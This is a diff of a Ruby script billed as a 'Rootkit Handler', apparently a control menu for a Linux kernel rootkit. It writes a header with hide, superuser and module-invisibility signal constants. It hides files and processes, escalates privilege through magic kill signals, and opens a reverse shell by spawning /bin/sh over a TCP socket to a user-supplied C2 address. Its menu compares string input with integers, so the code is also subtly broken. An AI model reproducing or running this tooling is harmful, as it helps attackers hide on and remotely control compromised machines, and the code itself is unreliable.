|
| 1 | +system 'clear' |
| 2 | +require 'colorize' |
| 3 | +require 'socket' |
| 4 | + |
| 5 | +puts <<-eos |
| 6 | + _______ |
| 7 | + /\ o o o\ |
| 8 | + /o \ o o o\_______ |
| 9 | +< >------> o /| |
| 10 | + \ o/ o /_____/o| |
| 11 | + \/______/ |oo| |
| 12 | + | o |o/ |
| 13 | + |_______|/ I used to roll the dice.. |
| 14 | + made by arthur & rodrigo |
| 15 | +
|
| 16 | + Ruby |
| 17 | + Rootkit Handler\n |
| 18 | +
|
| 19 | +1 - Install Ruby (Rootkit) |
| 20 | +2 - Uninstall Ruby (Rootkit) |
| 21 | +3 - Hide File |
| 22 | +4 - Hide Process |
| 23 | +5 - Privilege Escalation |
| 24 | +6 - Reverse Shell (Ring3) |
| 25 | +
|
| 26 | +eos |
| 27 | + |
| 28 | +def reverseShell(ip, port) |
| 29 | + spawn("/bin/sh",[:in,:out,:err]=>TCPSocket.new("#{ip}","#{port}")) |
| 30 | +end |
| 31 | + |
| 32 | +def writeLibrary(_rkname) |
| 33 | + rubyHeader = <<-eos |
| 34 | +#define RTHXR "rthxr" |
| 35 | +#define PF_INVISIBLE 0x10000000 |
| 36 | +#define MODULE_NAME "#{_rkname}" |
| 37 | +
|
| 38 | +struct linux_dirent { |
| 39 | + unsigned long d_ino; |
| 40 | + unsigned long d_off; |
| 41 | + unsigned short d_reclen; |
| 42 | + char d_name[1]; |
| 43 | +}; |
| 44 | +
|
| 45 | +enum { |
| 46 | + SIGINVIS = 9, |
| 47 | + SIGSUPER = 2, |
| 48 | + SIGMODINVIS = 6, |
| 49 | +}; |
| 50 | + eos |
| 51 | + |
| 52 | + file = File.write("library/Ruby.h", rubyHeader) |
| 53 | + puts 'Done!'.bold |
| 54 | +end |
| 55 | + |
| 56 | +print 'Driver (Rootkit) Name: ' |
| 57 | +rkname = gets.chomp.to_s |
| 58 | + |
| 59 | +print '\nRuby > '.bold |
| 60 | +ruby = gets.chomp.to_s |
| 61 | + |
| 62 | +if ruby == 1 |
| 63 | + writeLibrary(rkname) |
| 64 | + |
| 65 | +elsif ruby == 2 |
| 66 | + begin |
| 67 | + system 'kill -6 0' |
| 68 | + system "rmmod #{rkname}" |
| 69 | + rescue Exception => e |
| 70 | + puts "Error during Ruby (Rootkit) removal.. Err: " + e.message |
| 71 | + end |
| 72 | + |
| 73 | +elsif ruby == 3 |
| 74 | + print 'Directory/File Name: ' |
| 75 | + flName = gets.chomp.to_s |
| 76 | + |
| 77 | + system "mv #{flName} rthxr#{flName}" |
| 78 | + |
| 79 | +elsif ruby == 4 |
| 80 | + begin |
| 81 | + print "Process \"PID\" ID: " |
| 82 | + pid = gets.chomp.to_s |
| 83 | + |
| 84 | + system "kill -9 #{pid}" |
| 85 | + rescue Exception => e |
| 86 | + puts "Error during Ruby (Rootkit) execution.. Err: " + e.message |
| 87 | + end |
| 88 | + |
| 89 | +elsif ruby == 5 |
| 90 | + begin |
| 91 | + system "kill -2 0" |
| 92 | + rescue Exception => e |
| 93 | + puts "Error during Ruby (Rootkit) execution.. Err: " + e.message |
| 94 | + end |
| 95 | +elsif ruby == 6 |
| 96 | + begin |
| 97 | + print 'Local (C2) Address: ' |
| 98 | + laddr = gets.chomp.to_s |
| 99 | + |
| 100 | + print 'Local (C2) Port: ' |
| 101 | + lport = gets.chomp.to_s |
| 102 | + |
| 103 | + reverseShell(laddr, lport) |
| 104 | + rescue Exception => e |
| 105 | + puts 'Error during Ruby (Rootkit) execution.. Err: ' + e.message |
| 106 | + end |
| 107 | +end |
0 commit comments